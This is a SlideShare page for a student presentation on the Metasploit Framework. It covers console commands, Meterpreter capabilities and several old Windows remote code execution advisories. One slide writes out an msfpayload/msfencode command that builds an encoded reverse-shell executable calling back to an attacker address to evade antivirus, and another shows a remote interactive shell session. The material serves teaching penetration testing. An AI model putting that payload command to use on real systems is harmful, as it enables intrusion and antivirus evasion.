KEMBAR78
metaploit framework | PPTX
Le Quyen, profile picture
Uploaded byLe Quyen
PPTX, PDF587 views

metaploit framework

This vulnerability allows remote code execution if a target receives a specially crafted RPC request. An attacker could exploit it without authentication to run arbitrary code on Windows 2000, XP, and 2003 systems. Best practices like firewalls can help protect networks from outside attacks. The vulnerability is caused by unchecked buffers in the LSASS service.

Downloaded 32 times
Lê Đức Quyền 08130075 Cao Ngô Nhật thanh 08130081
• “The Metasploit Framework is an advanced open-source for attacking, testing, and using exploit code.” • Metasploit software helps security and IT professionals identify security issues, verify vulnerability in system. • Perform penetration tests • Overt penetration testing • Covert penetration testing • Consists of tools, libraries, modules, and user interfaces. These are configured and combined to launch an exploit. • Written in Ruby.
• Professional approach to penetration testing: – Automation – Reconnaissance, exploitation. • All in one Solution – Multi-platform – Diverse range of target applications • Open Source – Custom payloads
• Choose module exploit: • show exploits: list available exploits within the framework • use exploit_name: choose exploit • info exploit_name: view information about exploit • Choose payload • Show payloads: show only the payloads that are com-patible with chosen module. • Info payload_name: view detail information about payload • set payload payload_name: choose payload
• Configure chosen payload. • show options: view the options which you must configure • set option_name value: configure option • show advanceds: show advance options • check: verify options are configured whether exactly or not • show targets: list vulnerable potential targets. • set TARGET value: choose target. • exploit: initiates our exploit and attempts to attack the target
Meterpreter, short for The Meta -Interpreter is an advanced payload that is included in the Metaploit Framework. Its purpose is to provide complex command for exploiting and attacking remote machine. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred.
• Fs: Provides interaction with the filesystem on the remote machine. • Net: Provides interaction with the network stack on the remote machine. • Process: Provides interaction with processes on the remote machine . • Sys: Provides interaction with the environment on the remote machine
• screenshot: capture desktop screen of victim • sysinfo: view information about platform of victim • meterpreter > sysinfo Computer: IHAZSECURITY OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US
• execute: executes a process on the remote endpoint • kill: terminate one or more processes on the remote endpoint • Ps: list processes on the remote endpoint
Meterpreter> execute -f cmd –c execute: success, process id is 3516. execute: allocated channel 1 for new process. meterpreter> interact 1 interact: Switching to interactive console on 1... interact: Started interactive channel 1. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWS>ipconfig
• Encoding payload with MSFencode root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe • Multi-encoding: allows the payload to be encoded several times to throw off antivirus programs
•Vulnerability in Server Service Could Allow Remote Code Execution (958644) •The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. •Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. http://technet.microsoft.com/en-us/security/bulletin/ms08- 067
LSASS Vulnerability - CAN-2003-0533 Impact of vulnerability: Remote Code Execution An attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges. This vulnerability is caused by an unchecked buffer in the LSASS service.
• This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts. • Systems are only vulnerable to remote attack when sharing a printer and the remote attacker can access the printer share. •This vulnerability is caused when the Windows Print Spooler insufficiently restricts user permissions to access print spoolers. •Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. •http://technet.microsoft.com/en-us/security/bulletin/MS10-061
• This vulnerability is caused by the Windows RPCSS service does not properly check message inputs under certain circumstances. After establishing a connection, an attacker could send a specially crafted malformed RPC message to cause the underlying Distributed Component Object Model (DCOM) process on the remote system to fail in such a way that arbitrary code could be executed. • To exploit this vulnerability, the attacker would require the ability to send a specially crafted request to port 135, 139, 445 or 593 or any other specifically configured RPC port on the remote machine. •Best practices recommend blocking all TCP/IP ports that are not actually being used
• A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. • http://technet.microsoft.com/en- us/security/bulletin/MS08-041
metaploit framework

More Related Content

PPTX
Metasploit Railguns presentation @ tcs hyderabad
byChaitanya krishna
 
PPTX
Dealing with legacy code
byPrachi Gulihar
 
PPTX
Telehack: May the Command Line Live Forever
byGregory Hanis
 
PPTX
Hacker bootcamp
byGregory Hanis
 
PPTX
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
PPT
Stuxnet - Case Study
byAmr Thabet
 
PDF
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
byCanSecWest
 
PDF
Mission Critical Security in a Post-Stuxnet World Part 1
byByres Security Inc.
 
Metasploit Railguns presentation @ tcs hyderabad
byChaitanya krishna
 
Dealing with legacy code
byPrachi Gulihar
 
Telehack: May the Command Line Live Forever
byGregory Hanis
 
Hacker bootcamp
byGregory Hanis
 
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
Stuxnet - Case Study
byAmr Thabet
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
byCanSecWest
 
Mission Critical Security in a Post-Stuxnet World Part 1
byByres Security Inc.
 

What's hot

PPT
Basic Linux Security
bypankaj009
 
PDF
Spectre & Meltdown
byMurray Security Services
 
PPT
I Heart Stuxnet
byGil Megidish
 
PDF
A Stuxnet for Mainframes
byCheryl Biswas
 
PPTX
Stuxnet mass weopan of cyber attack
byAjinkya Nikam
 
PPT
Stuxnet dc9723
byIftach Ian Amit
 
PPT
Threats, Vulnerabilities & Security measures in Linux
byAmitesh Bharti
 
PPT
Stuxnet flame
bySantosh Khadsare
 
PDF
BlueHat v18 || The matrix has you - protecting linux using deception
byBlueHat Security Conference
 
PPTX
Metasploit framework in Network Security
byAshok Reddy Medikonda
 
PPT
Linux Security
bynayakslideshare
 
PPT
Unix Security
byreplay21
 
PPTX
On non existent 0-days, stable binary exploits and
byAlisa Esage Шевченко
 
PDF
Lecture malicious software
byrajakhurram
 
PDF
Stuxnet
bybueno buono good
 
PPSX
Stuxnet - More then a virus.
byHardeep Bhurji
 
PPTX
Metasploit (Module-1) - Getting Started With Metasploit
byAnurag Srivastava
 
PDF
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
bySecurity Bootcamp
 
PPTX
Program and System Threats
byReddhi Basu
 
PDF
Shellshock bug
byRaashid Muhammed
 
Basic Linux Security
bypankaj009
 
Spectre & Meltdown
byMurray Security Services
 
I Heart Stuxnet
byGil Megidish
 
A Stuxnet for Mainframes
byCheryl Biswas
 
Stuxnet mass weopan of cyber attack
byAjinkya Nikam
 
Stuxnet dc9723
byIftach Ian Amit
 
Threats, Vulnerabilities & Security measures in Linux
byAmitesh Bharti
 
Stuxnet flame
bySantosh Khadsare
 
BlueHat v18 || The matrix has you - protecting linux using deception
byBlueHat Security Conference
 
Metasploit framework in Network Security
byAshok Reddy Medikonda
 
Linux Security
bynayakslideshare
 
Unix Security
byreplay21
 
On non existent 0-days, stable binary exploits and
byAlisa Esage Шевченко
 
Lecture malicious software
byrajakhurram
 
Stuxnet
bybueno buono good
 
Stuxnet - More then a virus.
byHardeep Bhurji
 
Metasploit (Module-1) - Getting Started With Metasploit
byAnurag Srivastava
 
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
bySecurity Bootcamp
 
Program and System Threats
byReddhi Basu
 
Shellshock bug
byRaashid Muhammed
 

Viewers also liked

PPTX
Qo s trên windows
byLe Quyen
 
PPTX
Ldap
byLe Quyen
 
PPTX
IE Memory Protector
by3S Labs
 
PPTX
Browser exploit framework
byPrashanth Sivarajan
 
PPTX
Packet analysis using wireshark
byBasaveswar Kureti
 
PPTX
Kali net hunter
byPrashanth Sivarajan
 
PPTX
Pentesting ReST API
byNutan Kumar Panda
 
PDF
Study: The Future of VR, AR and Self-Driving Cars
byLinkedIn
 
Qo s trên windows
byLe Quyen
 
Ldap
byLe Quyen
 
IE Memory Protector
by3S Labs
 
Browser exploit framework
byPrashanth Sivarajan
 
Packet analysis using wireshark
byBasaveswar Kureti
 
Kali net hunter
byPrashanth Sivarajan
 
Pentesting ReST API
byNutan Kumar Panda
 
Study: The Future of VR, AR and Self-Driving Cars
byLinkedIn
 

Similar to metaploit framework

PPTX
Finalppt metasploit
bydevilback
 
PDF
Open Source Cyber Weaponry
byJoshua L. Davis
 
PDF
Metasploit Humla for Beginner
byn|u - The Open Security Community
 
PDF
24 33 -_metasploit
bywozgeass
 
PDF
Exploits Attack on Windows Vulnerabilities
byAmit Kumbhar
 
PDF
Metasploitation part-1 (murtuja)
byClubHack
 
PPTX
Pentesting with linux
byHammad Ahmed Khawaja
 
PPTX
Metasploit
byLalith Sai
 
DOCX
ARMITAGE-THE CYBER ATTACK MANAGEMENT
byDevil's Cafe
 
PPTX
Metasploit
byParth Sahu
 
PDF
Metasploit: Pwnage and Ponies
byTrowalts
 
DOCX
Backtrack Manual Part7
byNutan Kumar Panda
 
PPTX
Client side exploits
bynickyt8
 
PDF
Metasploit Demo
byn|u - The Open Security Community
 
PDF
01_Metasploit - The Elixir of Network Security
byHarish Chaudhary
 
PPTX
Metasploit
byInstitute of Information Security (IIS)
 
PDF
Metasploit Computer security testing tool
bymedoelkang600
 
PPTX
Metasploit
byRaghunath G
 
PDF
01 Metasploit kung fu introduction
byMostafa Abdel-sallam
 
PDF
Pen-Testing with Metasploit
byMohammed Danish Amber
 
Finalppt metasploit
bydevilback
 
Open Source Cyber Weaponry
byJoshua L. Davis
 
Metasploit Humla for Beginner
byn|u - The Open Security Community
 
24 33 -_metasploit
bywozgeass
 
Exploits Attack on Windows Vulnerabilities
byAmit Kumbhar
 
Metasploitation part-1 (murtuja)
byClubHack
 
Pentesting with linux
byHammad Ahmed Khawaja
 
Metasploit
byLalith Sai
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
byDevil's Cafe
 
Metasploit
byParth Sahu
 
Metasploit: Pwnage and Ponies
byTrowalts
 
Backtrack Manual Part7
byNutan Kumar Panda
 
Client side exploits
bynickyt8
 
Metasploit Demo
byn|u - The Open Security Community
 
01_Metasploit - The Elixir of Network Security
byHarish Chaudhary
 
Metasploit
byInstitute of Information Security (IIS)
 
Metasploit Computer security testing tool
bymedoelkang600
 
Metasploit
byRaghunath G
 
01 Metasploit kung fu introduction
byMostafa Abdel-sallam
 
Pen-Testing with Metasploit
byMohammed Danish Amber
 

metaploit framework

  • 1.
    Lê Đức Quyền 08130075 Cao Ngô Nhật thanh 08130081
  • 2.
    • “The MetasploitFramework is an advanced open-source for attacking, testing, and using exploit code.” • Metasploit software helps security and IT professionals identify security issues, verify vulnerability in system. • Perform penetration tests • Overt penetration testing • Covert penetration testing • Consists of tools, libraries, modules, and user interfaces. These are configured and combined to launch an exploit. • Written in Ruby.
  • 3.
    • Professional approachto penetration testing: – Automation – Reconnaissance, exploitation. • All in one Solution – Multi-platform – Diverse range of target applications • Open Source – Custom payloads
  • 5.
    Choose module exploit: • show exploits: list available exploits within the framework • use exploit_name: choose exploit • info exploit_name: view information about exploit • Choose payload • Show payloads: show only the payloads that are com-patible with chosen module. • Info payload_name: view detail information about payload • set payload payload_name: choose payload
  • 6.
    • Configure chosenpayload. • show options: view the options which you must configure • set option_name value: configure option • show advanceds: show advance options • check: verify options are configured whether exactly or not • show targets: list vulnerable potential targets. • set TARGET value: choose target. • exploit: initiates our exploit and attempts to attack the target
  • 7.
    Meterpreter, short forThe Meta -Interpreter is an advanced payload that is included in the Metaploit Framework. Its purpose is to provide complex command for exploiting and attacking remote machine. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred.
  • 8.
    • Fs: Providesinteraction with the filesystem on the remote machine. • Net: Provides interaction with the network stack on the remote machine. • Process: Provides interaction with processes on the remote machine . • Sys: Provides interaction with the environment on the remote machine
  • 9.
    • screenshot: capturedesktop screen of victim • sysinfo: view information about platform of victim • meterpreter > sysinfo Computer: IHAZSECURITY OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US
  • 10.
    • execute: executesa process on the remote endpoint • kill: terminate one or more processes on the remote endpoint • Ps: list processes on the remote endpoint
  • 11.
    Meterpreter> execute -fcmd –c execute: success, process id is 3516. execute: allocated channel 1 for new process. meterpreter> interact 1 interact: Switching to interactive console on 1... interact: Started interactive channel 1. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWS>ipconfig
  • 12.
    • Encoding payloadwith MSFencode root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe • Multi-encoding: allows the payload to be encoded several times to throw off antivirus programs
  • 14.
    •Vulnerability in ServerService Could Allow Remote Code Execution (958644) •The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. •Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. http://technet.microsoft.com/en-us/security/bulletin/ms08- 067
  • 15.
    LSASS Vulnerability -CAN-2003-0533 Impact of vulnerability: Remote Code Execution An attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges. This vulnerability is caused by an unchecked buffer in the LSASS service.
  • 16.
    • This isa remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts. • Systems are only vulnerable to remote attack when sharing a printer and the remote attacker can access the printer share. •This vulnerability is caused when the Windows Print Spooler insufficiently restricts user permissions to access print spoolers. •Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. •http://technet.microsoft.com/en-us/security/bulletin/MS10-061
  • 17.
    • This vulnerabilityis caused by the Windows RPCSS service does not properly check message inputs under certain circumstances. After establishing a connection, an attacker could send a specially crafted malformed RPC message to cause the underlying Distributed Component Object Model (DCOM) process on the remote system to fail in such a way that arbitrary code could be executed. • To exploit this vulnerability, the attacker would require the ability to send a specially crafted request to port 135, 139, 445 or 593 or any other specifically configured RPC port on the remote machine. •Best practices recommend blocking all TCP/IP ports that are not actually being used
  • 18.
    • A remotecode execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. • http://technet.microsoft.com/en- us/security/bulletin/MS08-041

Editor's Notes

  • #12 Interact 1:Bắt đầu một phiên làm việc với channel vừa thiết lập với remote machine 
  • #19 Snapshot Viewer for Microsoft AccessCriticalRemote Code ExecutionCriticalMicrosoft Office Access 2000CriticalRemote Code ExecutionCriticalMicrosoft Office Access 2002CriticalRemote Code ExecutionCriticalMicrosoft Office Access 2003CriticalRemote Code ExecutionCritical